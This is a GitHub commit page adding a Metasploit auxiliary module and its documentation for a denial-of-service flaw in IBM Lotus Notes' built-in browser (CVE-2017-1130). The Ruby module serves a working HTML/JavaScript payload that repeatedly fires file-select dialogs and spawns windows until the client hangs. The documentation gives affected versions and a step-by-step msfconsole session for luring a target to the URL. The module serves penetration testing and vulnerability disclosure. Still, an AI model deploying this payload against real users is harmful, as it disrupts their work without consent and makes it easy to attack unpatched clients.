Permalink
Browse files

Land #9060, IBM Lotus Notes DoS (CVE-2017-1130).

  • Loading branch information...
pbarry-r7 committed Nov 7, 2017
2 parents 92c5b27 + 85b8b41 commit fc87ee08d93540bdf693409ad20c87b40181e20c
@@ -0,0 +1,67 @@
## Vulnerable Application
This module exploits a vulnerability in the built-in web-browser of IBM Lotus Notes client application.
If a user is persuaded to click on a malicious link, it would open up many file select dialog boxes which,
would cause the client hang and have to be restarted.
Affected Products and Versions
IBM Notes 9.0.1 to 9.0.1 FP8 IF1
IBM Notes 9.0 to 9.0 IF4.
IBM Notes 8.5.3 to 8.5.3 FP6 IF13.
IBM Notes 8.5.2 to 8.5.2 FP4 IF3.
IBM Notes 8.5.1. to 8.5.1 FP5 IF5.
IBM Notes 8.5 release
Related security bulletin from IBM: http://www-01.ibm.com/support/docview.wss?uid=swg21999384
## Verification
Start msfconsole
`use auxiliary/dos/http/ibm_lotus_notes2.rb`
Set `SRVHOST`
Set `SRVPORT`
run (Server started)
Visit server URL in the built-in web-browser of IBM Notes client application
## Scenarios
```
msf > use auxiliary/dos/http/ibm_lotus_notes2
msf auxiliary(ibm_lotus_notes2) > show options
Module options (auxiliary/dos/http/ibm_lotus_notes2):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Auxiliary action:
Name Description
---- -----------
WebServer
msf auxiliary(ibm_lotus_notes2) > set SRVHOST 192.168.0.50
SRVHOST => 192.168.0.50
msf auxiliary(ibm_lotus_notes2) > set SRVPORT 9092
SRVPORT => 9092
msf auxiliary(ibm_lotus_notes2) > run
[*] Auxiliary module execution completed
msf auxiliary(ibm_lotus_notes2) >
[*] Using URL: http://192.168.0.50:9092/mypath
[*] Server started.
msf auxiliary(ibm_lotus_notes2) >
```
At this point, the target should use the built-in web browser of their IBM Lotus Notes client to navigate to the above "Using URL" value. And then they should see their Notes app become unresponsive.
@@ -0,0 +1,70 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpServer
def initialize(info = {})
super(
update_info(
info,
'Name' => "IBM Notes Denial Of Service",
'Description' => %q(
This module exploits a vulnerability in the native browser that comes with IBM Lotus Notes.
If successful, the browser will crash after viewing the webpage.
),
'License' => MSF_LICENSE,
'Author' => [
'Dhiraj Mishra',
],
'References' => [
['EDB', '42604'],
[ 'CVE', '2017-1130' ]
],
'DisclosureDate' => 'Aug 31 2017',
'Actions' => [[ 'WebServer' ]],
'PassiveActions' => [ 'WebServer' ],
'DefaultAction' => 'WebServer'
)
)
end
def run
exploit # start http server
end
def setup
@html = %|
<html><body>
<input type="file" id="f">
<script>
var w;
var kins = {};
var i = 1;
f.click();
setInterval("f.click()", 1);
setInterval(function(){
for (var k in kins) {
if (kins[k] && kins[k].status === undefined) {
kins[k].close();
delete kins[k];
}
}
w = open('data:text/html,<input type="file" id="f"><script>f.click();setInterval("f.click()", 1);<\\/script>');
if (w) {
kins[i] = w;
i++;
}
}, 1);
</script>
</body></html>
|
end
def on_request_uri(cli, _request)
print_status('Sending response')
send_response(cli, @html)
end
end

0 comments on commit fc87ee0

Please sign in to comment.